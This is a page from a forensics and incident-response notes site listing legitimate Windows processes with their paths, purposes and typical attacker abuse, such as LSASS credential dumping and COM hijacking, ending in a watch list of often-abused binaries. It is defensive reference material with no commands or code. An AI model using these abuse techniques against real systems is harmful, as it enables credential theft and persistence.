DFIR-Notes
Windows Forensics
Windows Forensics
  • windows Memory Forensics
  • Windows Registry Forensics
  • Windows Registry Forensics with RegRipper
  • Windows Powershell Forensics
  • Incident Response Eventhoods
  • Incident Response splunk filters
  • LNK Files (Shortcut Files) Forensics
  • Jump List Forensics
  • Prefetch Files Forensics
  • Living off the Land Binaries (LOLBins)
  • COM (Component Object Model)
  • Key Email Headers for SOC Analysts and DFIR
  • Distributed Component Object Model (DCOM)
  • legitimate Windows processes
  • UserAssist Keys
  • Application Compatibility Cache (Shim Cache)
  • CIDSizeMRU
  • Start Menu Run MRUs
  • MUI Cache
  • BAM (Background Activity Moderator)
  • SRUM (System Resource Usage Monitor)
  • Master File Table (MFT), NTFS, $LogFile, and $UsnJrnl: Forensics
  • 🔹 Windows System Processes
Powered by GitBook
On this page
  • 1. System-Level Processes
  • 2. Service Host Processes
  • 3. User-Level Processes
  • 4. Network and Communication Processes
  • 5. Scheduled Task and Utility Processes
  • 6. Browser and Media Processes
  • 7. System Update Processes
  • 8. Administrative and Diagnostic Tools
  • Processes Often Targeted by Attackers

legitimate Windows processes

Here is a list of legitimate Windows processes, their typical paths, purposes, and why attackers might target them. This overview simplifies the information for better understanding.

1. System-Level Processes

System

  • Path: N/A (Kernel-level process)

  • Purpose: Manages core operating system functions, including hardware interactions.

  • Attack Use: Rarely targeted directly but used to hide malicious activity in kernel-mode attacks

smss.exe (Session Manager Subsystem)

  • Path: C:\Windows\System32\smss.exe

  • Purpose: Handles session initialization during system startup.

  • Attack Use: Rarely abused; critical to system stability.

csrss.exe (Client/Server Runtime Subsystem)

  • Path: C:\Windows\System32\csrss.exe

  • Purpose: Manages graphical and console operations.

  • Attack Use: Sometimes mimicked in process injection attacks.

wininit.exe (Windows Initialization)

  • Path: C:\Windows\System32\wininit.exe

  • Purpose: Starts system services during boot.

  • Attack Use: Rarely abused; attackers may spoof this process for persistence

2. Service Host Processes

svchost.exe (Service Host)

  • Path: C:\Windows\System32\svchost.exe

  • Purpose: Hosts Windows services (e.g., network services, updates).

  • Attack Use: Common for malicious DLL injection and privilege escalation.

services.exe (Service Control Manager)

  • Path: C:\Windows\System32\services.exe

  • Purpose: Manages services and their startup processes.

  • Attack Use: Used to register malicious services for persistence

3. User-Level Processes

explorer.exe (Windows Explorer)

  • Path: C:\Windows\explorer.exe

  • Purpose: Manages the desktop, taskbar, and file explorer.

  • Attack Use: Often abused for persistence via COM hijacking or DLL injection.

taskhostw.exe (Task Host)

  • Path: C:\Windows\System32\taskhostw.exe

  • Purpose: Hosts dynamic-link libraries (DLLs) for tasks and processes.

  • Attack Use: Used to execute malicious DLLs.

dllhost.exe (COM Surrogate)

  • Path: C:\Windows\System32\dllhost.exe

  • Purpose: Hosts COM objects that do not run in the main application.

  • Attack Use: Common for COM hijacking to execute malicious DLLs.

cmd.exe (Command Prompt)

  • Path: C:\Windows\System32\cmd.exe

  • Purpose: Command-line interface for executing scripts and commands.

  • Attack Use: Used to execute commands or scripts stealthily.

powershell.exe (PowerShell)

  • Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  • Purpose: Scripting tool for automation and management tasks.

  • Attack Use: A primary tool for attackers due to its powerful scripting capabilities.

4. Network and Communication Processes

lsass.exe (Local Security Authority Subsystem Service)

  • Path: C:\Windows\System32\lsass.exe

  • Purpose: Manages user authentication and password validation.

  • Attack Use: Dumped to extract credentials using tools like Mimikatz.

winlogon.exe (Windows Logon Application)

  • Path: C:\Windows\System32\winlogon.exe

  • Purpose: Manages user logon sessions.

  • Attack Use: Hijacked for persistence.

mstsc.exe (Remote Desktop Client)

  • Path: C:\Windows\System32\mstsc.exe

  • Purpose: Remote desktop connections.

  • Attack Use: Used to interact with compromised systems remotely.

rundll32.exe (Run DLL as an App)

  • Path: C:\Windows\System32\rundll32.exe

  • Purpose: Executes functions from DLLs.

  • Attack Use: Abused to execute malicious payloads.

wscript.exe and cscript.exe (Windows Script Host)

  • Path: C:\Windows\System32\wscript.exe / C:\Windows\System32\cscript.exe

  • Purpose: Runs scripts like VBScript and JScript.

  • Attack Use: Executes malicious scripts

5. Scheduled Task and Utility Processes

schtasks.exe (Task Scheduler)

  • Path: C:\Windows\System32\schtasks.exe

  • Purpose: Schedules and manages tasks.

  • Attack Use: Creates tasks for persistence or delayed execution of malware.

taskmgr.exe (Task Manager)

  • Path: C:\Windows\System32\taskmgr.exe

  • Purpose: Monitors running processes and system performance.

  • Attack Use: Rarely targeted but useful for detecting malicious processes.

6. Browser and Media Processes

msedge.exe (Microsoft Edge)

  • Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

  • Purpose: Internet browsing.

  • Attack Use: Rarely targeted directly; browser vulnerabilities are exploited instead.

wmplayer.exe (Windows Media Player)

  • Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

  • Purpose: Plays media files.

  • Attack Use: Abused to execute malicious media files.

7. System Update Processes

wuauclt.exe (Windows Update Client)

  • Path: C:\Windows\System32\wuauclt.exe

  • Purpose: Manages Windows updates.

  • Attack Use: Rarely abused; attackers may spoof update mechanisms

8. Administrative and Diagnostic Tools

regedit.exe (Registry Editor)

  • Path: C:\Windows\System32\regedit.exe

  • Purpose: Edits the Windows Registry.

  • Attack Use: Used to modify Registry keys manually or programmatically.

msiexec.exe (Windows Installer)

  • Path: C:\Windows\System32\msiexec.exe

  • Purpose: Installs MSI packages.

  • Attack Use: Executes malicious installation packages.

perfmon.exe (Performance Monitor)

  • Path: C:\Windows\System32\perfmon.exe

  • Purpose: Monitors system performance.

  • Attack Use: Rarely abused but could be used for reconnaissance

Processes Often Targeted by Attackers

  1. High Privilege Processes:

    • svchost.exe

    • lsass.exe

    • winlogon.exe

  2. Versatile Execution Processes:

    • powershell.exe

    • cmd.exe

    • rundll32.exe

    • mshta.exe

    • reg.exe

    • certutil.exe

  3. Service and Communication Processes:

    • dllhost.exe

    • explorer.exe

  4. Automation and Scripting Processes:

    • wscript.exe

    • cscript.exe

PreviousDistributed Component Object Model (DCOM)NextUserAssist Keys

Last updated 2 months ago